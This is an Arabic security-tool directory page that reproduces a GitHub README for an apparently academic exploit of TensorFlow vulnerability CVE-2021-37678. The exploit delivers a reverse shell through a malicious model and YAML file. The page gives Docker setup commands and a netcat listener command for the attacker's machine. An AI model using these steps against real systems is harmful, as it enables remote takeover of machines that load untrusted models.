Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ExploitTensorflowCVE-2021-37678 — TP أمن الحاسوب UTN FRBA 2021 | Kitploit
أدوات/GitHubGitHub/fran-cics/exploittensorflowcve-2021-37678
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمتطوير الحمولاتأمن الذكاء الاصطناعي
GitHubfran-cics/exploittensorflowcve-2021-37678

ExploitTensorflowCVE-2021-37678

TP أمن الحاسوب UTN FRBA 2021

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
22منذ 4 سنواتلم تتم المراجعة بعد

CVE-2021-37678 استغلال

لاستغلال الثغرة، من الضروري تشغيل حاوية docker ببيئة مُعدَّة لرفع Tensorflow بإصدار 2.2.3 الذي لا يزال يحتوي على الثغرة. تتكون من:

  • بنية AMD 64 بت
  • CPU أو GPU يمكنها تنفيذ تعليمات AVX
  • بايثون 64 بت الإصدار 3.6.9
  • Pip3 الإصدار 20.2.4
  • Tensorflow الإصدار 2.2.3
  • PyYAML الإصدار 3.12

تحقق مما إذا كان الجهاز يحتوي على docker عن طريق تشغيل:

root@kitploit:~
docker -v

بمجرد أن يحتوي نظام التشغيل لدينا على docker مثبتًا، قم بتشغيل الأوامر التالية في المجلد الجذر لهذا المستودع لبناء التطبيق وتشغيله:

root@kitploit:~
docker-compose build
root@kitploit:~
docker-compose up

أو بدلاً من ذلك، للتشغيل بدون docker compose:

root@kitploit:~
docker build -t docker-exploit-tensorflow-vulnerability:1.0 . # para construir la imagen
root@kitploit:~
docker run --add-host=host.docker.internal:host-gateway --name exploit-tensorflow-vulnerability docker-exploit-tensorflow-vulnerability:1.0 # para crear y lanzar el proceso por primera vez
docker start -a exploit-tensorflow-vulnerability # para lanzar el proceso nuevamente

لكي يعمل الـ reverse shell، يجب تثبيت netcat على جهاز المهاجم، وفتح منفذ استماع لجلسة ssh. مثال:

root@kitploit:~
nc -lvp 10000

ثم، سيتم استغلال الثغرة من خلال نموذج ذكاء اصطناعي خبيث، حيث سنقوم بتشغيل الاتصال بالمهاجم. يجب تكوين عنوان IP ومنفذ الاستماع الخاص بالمهاجم في الملف reverseShell.yaml

تنزيل الأداة